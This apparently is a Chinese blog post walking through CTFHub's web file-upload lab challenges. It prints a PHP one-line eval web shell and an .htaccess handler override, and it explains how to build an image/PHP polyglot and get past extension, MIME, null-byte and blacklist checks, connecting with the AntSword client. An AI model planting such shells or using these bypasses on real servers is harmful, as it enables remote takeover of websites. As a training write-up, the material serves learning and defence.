<!DOCTYPE html>
<html lang="zh-CN">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  <link rel="icon" href="">
  <title>CTFHub-Web-文件上传 | 10vexh's Blog.</title>
  <meta name="author" content="10vexh" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="" />
  
  <meta name="description" content="CTFHub-Web-文件上传​        文件上传是指用户上传了一个可执行的脚本文件，并且通过该文件获取了执行服务器端命令的能力。 无验证​        最基本的文件上传，写一个一句话木马，然后直接上传。会返回上传的路径，然后用蚁剑就可以取了。 1&lt;?php @eval($_POST[&quot;hack&quot;]);?&gt;  前端验证​        在上题的基础上，多了j">
<meta property="og:type" content="article">
<meta property="og:title" content="CTFHub-Web-文件上传">
<meta property="og:url" content="http://10vexh.top/2022/02/15/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="10vexh&#39;s Blog.">
<meta property="og:description" content="CTFHub-Web-文件上传​        文件上传是指用户上传了一个可执行的脚本文件，并且通过该文件获取了执行服务器端命令的能力。 无验证​        最基本的文件上传，写一个一句话木马，然后直接上传。会返回上传的路径，然后用蚁剑就可以取了。 1&lt;?php @eval($_POST[&quot;hack&quot;]);?&gt;  前端验证​        在上题的基础上，多了j">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://10vexh.top/null">
<meta property="article:published_time" content="2022-02-15T15:32:53.000Z">
<meta property="article:modified_time" content="2022-02-15T15:32:28.941Z">
<meta property="article:author" content="10vexh">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://10vexh.top/null">
<meta name="twitter:site" content="@null">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" type="text/css" media="all">
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night-eighties.min.css" type="text/css" media="all">
  
  
  <link rel="stylesheet" id="fontawe-css" href="https://unpkg.com/font-awesome@4.7.0/css/font-awesome.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="nprogress-css" href="https://unpkg.com/nprogress@0.2.0/nprogress.css" type="text/css" media="all">
  
  
    <link rel="stylesheet" href="https://unpkg.com/aplayer@1.10.1/dist/APlayer.min.css">
  
  
    <link rel="stylesheet" href="https://unpkg.com/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-dark.min.css" type="text/css" media="all">
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="https://unpkg.com/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="https://unpkg.com/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
  <style>
    
      .kratos-cover.kratos-cover-2 {
        background-image: url('/images/banner.webp');
      }
    
    
      @media(min-width:768px) {
        body.custom-background {
          background-image: url('/images/bg.webp');
        }
      }
    
  </style>
  
<meta name="generator" content="Hexo 6.0.0"></head>


    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                        <li><a href="/"><i class="fa fa-home"></i>首页</a></li>
                                    
                                
                                    
                                        <li><a href="/archives/"><i class="fa fa-file"></i>档案馆</a></li>
                                    
                                
                                    
                                        <li><a href="/friends/"><i class="fa fa-paw"></i>好伙伴</a></li>
                                    
                                
                                    
                                        <li>
                                            <a><i class="fa fa-link"></i>链接</a>
                                            <ul class="sub-menu">
                                                
                                                    
                                                
                                                    
                                                        <li><a target="_blank" rel="noopener" href="https://candinya.com">作者博客</a></li>
                                                    
                                                
                                                    
                                                        <li><a target="_blank" rel="noopener" href="https://github.com/Candinya/Kratos-Rebirth">项目链接</a></li>
                                                    
                                                
                                            </ul>
                                        </li>
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">10vexh&#39;s Blog.</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>10vexh&#39;s Blog.</h2> <br />
                        <span></span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        

            <section class="col-md-8">

        

            <article>
    <div class="kratos-hentry kratos-post-inner clearfix">
        <header class="kratos-entry-header">
            
                <h1 class="kratos-entry-title text-center">CTFHub-Web-文件上传</h1>
            
            
            <ul class="kratos-post-meta text-center">
                <li><i class="fa fa-calendar"></i> 2022-02-15</li>
                <li><i class="fa fa-user"></i> 作者 10vexh</li>
                <li>
                    <i class="fa fa-edit"></i> 
                    
                    
                        ~1.99K
                    
                    字
                </li>
                
            </ul>
        </header>
        <div class="kratos-post-content">
            <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                本文最后编辑于 <time datetime="1644939148941"></time> 前，其中的内容可能需要更新。
            </div>
            
                <div class="kratos-post-inner-toc">
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">1.</span> <span class="toc-text">CTFHub-Web-文件上传</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A0%E9%AA%8C%E8%AF%81"><span class="toc-number">1.1.</span> <span class="toc-text">无验证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%AB%AF%E9%AA%8C%E8%AF%81"><span class="toc-number">1.2.</span> <span class="toc-text">前端验证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#htaccess"><span class="toc-number">1.3.</span> <span class="toc-text">.htaccess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MIME%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.</span> <span class="toc-text">MIME绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%A4%B4%E6%A3%80%E6%9F%A5"><span class="toc-number">1.5.</span> <span class="toc-text">文件头检查</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#00%E6%88%AA%E6%96%AD"><span class="toc-number">1.6.</span> <span class="toc-text">00截断</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8C%E5%86%99%E5%90%8E%E7%BC%80"><span class="toc-number">1.7.</span> <span class="toc-text">双写后缀</span></a></li></ol></li></ol>
                </div>
            
            <hr />
            <h1 id="CTFHub-Web-文件上传"><a href="#CTFHub-Web-文件上传" class="headerlink" title="CTFHub-Web-文件上传"></a>CTFHub-Web-文件上传</h1><p>​        文件上传是指用户上传了一个可执行的脚本文件，并且通过该文件获取了执行服务器端命令的能力。</p>
<h2 id="无验证"><a href="#无验证" class="headerlink" title="无验证"></a>无验证</h2><p>​        最基本的文件上传，写一个一句话木马，然后直接上传。会返回上传的路径，然后用蚁剑就可以取了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[&quot;hack&quot;]);?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="前端验证"><a href="#前端验证" class="headerlink" title="前端验证"></a>前端验证</h2><p>​        在上题的基础上，多了js前端验证，我们依然上传上一题的php文件，发现被前端拦截</p>
<p><img src="/2022/02/15/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/%E5%89%8D%E7%AB%AF%E9%AA%8C%E8%AF%811.png" alt="前端验证1"></p>
<p>我们通过查看源代码，发现只能上传<code>jpg</code>,<code>png</code>,<code>gif</code>。因此我们可以先把后缀改成可以上传的jpg，然后通过抓包更改为php成功上传。再得到相对路径利用蚁剑进行连接。</p>
<p><img src="/2022/02/15/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/%E5%89%8D%E7%AB%AF%E9%AA%8C%E8%AF%812.png" alt="前端验证2"></p>
<h2 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a>.htaccess</h2><p>​        htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能</p>
<p>​        我们通过上传一个.htaccess文件，令Apache把所有的.xxx文件都解析为php文件。</p>
<p>.htaccess内容：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SetHandler application/x-httpd-php</span><br></pre></td></tr></table></figure>

<p>上传完成后，再传我们上一题的<code>hack.jpg</code>文件，会被默认执行为php文件，从而实现注入。</p>
<h2 id="MIME绕过"><a href="#MIME绕过" class="headerlink" title="MIME绕过"></a>MIME绕过</h2><p>​        <strong>MIME</strong>(<strong>M</strong>ultipurpose <strong>I</strong>nternet <strong>M</strong>ail <strong>E</strong>xtensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型，当该扩展名文件被访问的时候，浏览器会自动使用指定应用程序来打开。</p>
<p>​        服务端<code>MIME</code>类型检测是通过检查http包的Content-Type字段中的值来判断上传文件是否合法的。</p>
<p>​        常见的<code>MIME</code>类型比如有text/html，image/jpeg，application/json等等，我们可以先传一个正常的php文件，通过抓包更改他的Content-Type字段，改成可以通过的字段，然后放包进行成功的注入。</p>
<p><img src="/2022/02/15/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/MIME%E7%BB%95%E8%BF%87.png" alt="MIME绕过"></p>
<p>同样利用蚁剑获取flag。</p>
<h2 id="文件头检查"><a href="#文件头检查" class="headerlink" title="文件头检查"></a>文件头检查</h2><p>​        这题我们要在前面题目的基础上，加入图片马。将我们的一句话木马和图片合在一起，进行绕过。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy 1.png/b+hack.php/a flag.php</span><br></pre></td></tr></table></figure>

<p>然后上传我们的flag.php文件，通过bp将他的Content-Type改成图片的image/jpeg，进行绕过。</p>
<p>成功上传，蚁剑连接得到flag.</p>
<h2 id="00截断"><a href="#00截断" class="headerlink" title="00截断"></a>00截断</h2><p>题目说了要了解一下 PHP 5.2 00截断上传的原理</p>
<p><code>%00</code>是字符串结束的标识，攻击者通过主动添加标识符来进行截断。</p>
<p>在数据包存在上传路径的时候，比如这题遇到的上传路径为<code>/var/www/html/upload</code>，我们可以直接在路径之后加入<code>hack.php%00</code>进行截断。然后在蚁剑中通过<code>url/upload/hack.php</code>的路径进行读取flag.</p>
<p><img src="/2022/02/15/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/00%E6%88%AA%E6%96%AD.png" alt="00截断"></p>
<h2 id="双写后缀"><a href="#双写后缀" class="headerlink" title="双写后缀"></a>双写后缀</h2><p>​        这个就和sql的双写绕过一个套路，我们在前面测试的时候发现，上传hack.php文件，会被语句</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$name = basename($_FILES[&#x27;file&#x27;][&#x27;name&#x27;]);</span><br><span class="line">$blacklist = array(&quot;php&quot;, &quot;php5&quot;, &quot;php4&quot;, &quot;php3&quot;, &quot;phtml&quot;, &quot;pht&quot;, &quot;jsp&quot;, &quot;jspa&quot;, &quot;jspx&quot;, &quot;jsw&quot;, &quot;jsv&quot;, &quot;jspf&quot;, &quot;jtml&quot;, &quot;asp&quot;, &quot;aspx&quot;, &quot;asa&quot;, &quot;asax&quot;, &quot;ascx&quot;, &quot;ashx&quot;, &quot;asmx&quot;, &quot;cer&quot;, &quot;swf&quot;, &quot;htaccess&quot;, &quot;ini&quot;);</span><br><span class="line">$name = str_ireplace($blacklist, &quot;&quot;, $name);</span><br></pre></td></tr></table></figure>

<p>进行过滤，将我们的php用空格替换，因此我们可以把后缀改成<code>phphpp</code>，中间php过滤后还有一个php，成功识别实现注入。</p>

        </div>
        
            <div class="kratos-copyright text-center clearfix">
                <h5>本作品采用 <a rel="license nofollow" target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
            </div>
        
        <footer class="kratos-entry-footer clearfix">
            
                <div class="post-like-donate text-center clearfix" id="post-like-donate">
                
                
                    <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                    <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "http://10vexh.top/2022/02/15/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "http://10vexh.top/2022/02/15/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/";
            const title         = "「CTFHub-Web-文件上传」";
            const excerpt       = `CTFHub-Web-文件上传​        文件上传是指用户上传了一个可执行的脚本文件，并且通过该文件获取了执行服务器端命令的能力。
无验证​        最基本的文件上传，写一个一句话木马，然后直接上传。会返回上传的路径，然后...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                
                </div>
            
            <div class="footer-tag clearfix">
                <div class="pull-left">
                <i class="fa fa-tags"></i>
                    
                </div>
                <div class="pull-date">
                <span>最后编辑：2022-02-15</span>
                </div>
            </div>
        </footer>
    </div>
    
        <nav class="navigation post-navigation clearfix" role="navigation">
            
            <div class="nav-previous clearfix">
                <a title=" CTFHub-Web-RCE" href="/2022/02/15/CTFHub-Web-RCE/">&lt; 上一篇</a>
            </div>
            
            
            <div class="nav-next clearfix">
                <a title=" WEB基础漏洞" href="/2022/03/17/WEB基础漏洞/">下一篇 &gt;</a>
            </div>
            
        </nav>
    
    
</article>

        

            </section>

        

                
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/avatar.webp" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center">水至清则无鱼</p>
    </div>
    <div class="site-meta">
        <a class="meta-item" href="/archives/">
            <span class="title">
                文章
            </span>
            <span class="count">
                7
            </span>
        </a>
        <a class="meta-item" href="/categories/">
            <span class="title">
                分类
            </span>
            <span class="count">
                0
            </span>
        </a>
        <a class="meta-item" href="/tags/">
            <span class="title">
                标签
            </span>
            <span class="count">
                0
            </span>
        </a>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                    <aside id="krw-toc" class="widget widget-kratos-toc clearfix">
    <div class="photo-background"></div>
    <h4 class="widget-title no-after">
        <i class="fa fa-compass"></i>
        文章目录
        <span class="toc-progress-bar"></span>
    </h4>
    <div class="textwidget">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-text">CTFHub-Web-文件上传</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A0%E9%AA%8C%E8%AF%81"><span class="toc-text">无验证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%AB%AF%E9%AA%8C%E8%AF%81"><span class="toc-text">前端验证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#htaccess"><span class="toc-text">.htaccess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MIME%E7%BB%95%E8%BF%87"><span class="toc-text">MIME绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%A4%B4%E6%A3%80%E6%9F%A5"><span class="toc-text">文件头检查</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#00%E6%88%AA%E6%96%AD"><span class="toc-text">00截断</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8C%E5%86%99%E5%90%8E%E7%BC%80"><span class="toc-text">双写后缀</span></a></li></ol></li></ol>
    </div>
</aside>
                
                

            
                
            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
            <a class="list-group-item" href="/2022/03/17/WEB%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/"><i class="fa  fa-book"></i> WEB基础漏洞</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/02/15/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"><i class="fa  fa-book"></i> CTFHub-Web-文件上传</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/02/15/CTFHub-Web-RCE/"><i class="fa  fa-book"></i> CTFHub-Web-RCE</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/02/13/CTFHub-Web-HTTP%E5%8D%8F%E8%AE%AE/"><i class="fa  fa-book"></i> CTFHub-Web-HTTP协议</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/01/24/CTFHub-Web-SSRF/"><i class="fa  fa-book"></i> CTFHub-Web-SSRF</a>
            
          
        
          
            
          
            
      </ul>
  </div>
  </aside>

            
    </div>
</section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        
                        
                        
                        
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://github.com/10vexh"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2022 10vexh's Blog. 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by 10vexh.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                    </ul>
                </div>
            </div>
        </div>
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
    </div>
</footer>
</div>
</div>

        <script defer src="https://unpkg.com/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="https://unpkg.com/nprogress@0.2.0/nprogress.js"></script>
<script>
    if (!window.kr) {
        window.kr = {};
    }
    window.kr.notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));
    window.kr.siteRoot = "/";
</script>


    <script async src="/js/candy.min.js"></script>



    <script defer src="https://unpkg.com/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="https://unpkg.com/meting@2/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="3204190542"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="https://unpkg.com/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="https://unpkg.com/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>


    <script defer src="/js/kr-dark.min.js"></script>



<!-- Extra support for third-party plguins  -->


    </body>
</html>